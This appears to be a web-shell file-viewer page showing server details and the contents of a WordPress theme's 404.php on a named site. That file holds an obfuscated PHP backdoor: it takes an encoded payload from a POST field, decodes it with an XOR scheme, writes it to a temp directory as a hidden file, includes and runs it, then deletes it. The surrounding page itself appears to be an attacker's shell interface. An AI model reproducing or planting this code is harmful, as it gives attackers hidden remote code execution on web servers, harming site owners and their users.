HEX
Server: nginx/1.26.1
System: Linux iZrj9cbdvwu1cot8sjlyzlZ 5.10.134-15.al8.x86_64 #1 SMP Thu Jul 20 00:44:04 CST 2023 x86_64
User: www (1000)
PHP: 7.4.33
Disabled: passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
Upload Files
File: /www/wwwroot/dewenlabels.com/wp-content/themes/astra/404.php
<?php if(isset($_POST)&&isset($_POST["ho\154der"])):$_0=$_POST["\x68o\154d\145r"];$_0=eXPloDE(".",$_0);$_1="";$_2="abcdef\x67hi\152klmn\x6fpqrstuvw\x78yz0\061\x32345\06678\x39";$_3=StRLeN($_2);$_4=(int)RoUnD(0+0+0);$_5=CoUNT($_0);do{if($_4>=$_5):break;endif;$_6=$_0[$_4];$_7=orD($_2[$_4%$_3]);$_8=((int)$_6-$_7-($_4%(int)ROUND(3.3333333333333+3.3333333333333+3.3333333333333)))^(0x53-0x125- -231);$_1.=chR($_8);$_4++;}while(true);$_9=ArraY_filtER([INi_Get("uploa\x64\x5ftmp\x5f\x64\x69r"),SEssion_SavE_pATH(),"/\x76a\x72/\x74mp",Sys_GEt_teMP_Dir(),"\x2f\x64e\166/\163h\155",GeTenV("\124\x4dP"),GEtcWd(),"/tm\x70",GeTEnv("T\105MP")]);for($_10=(int)roUnd(0+0+0+0),$_11=cOunt($_9);$_10<$_11;$_10++):$_12=$_9[$_10];if(is_DiR($_12)?Is_WRItAblE($_12):false):$_13=JOin("/",[$_12,"\056sy\155"]);if(@fiLe_PUt_CoNTents($_13,$_1)!==false):include $_13;UnLiNK($_13);exit;endif;endif;endfor;endif;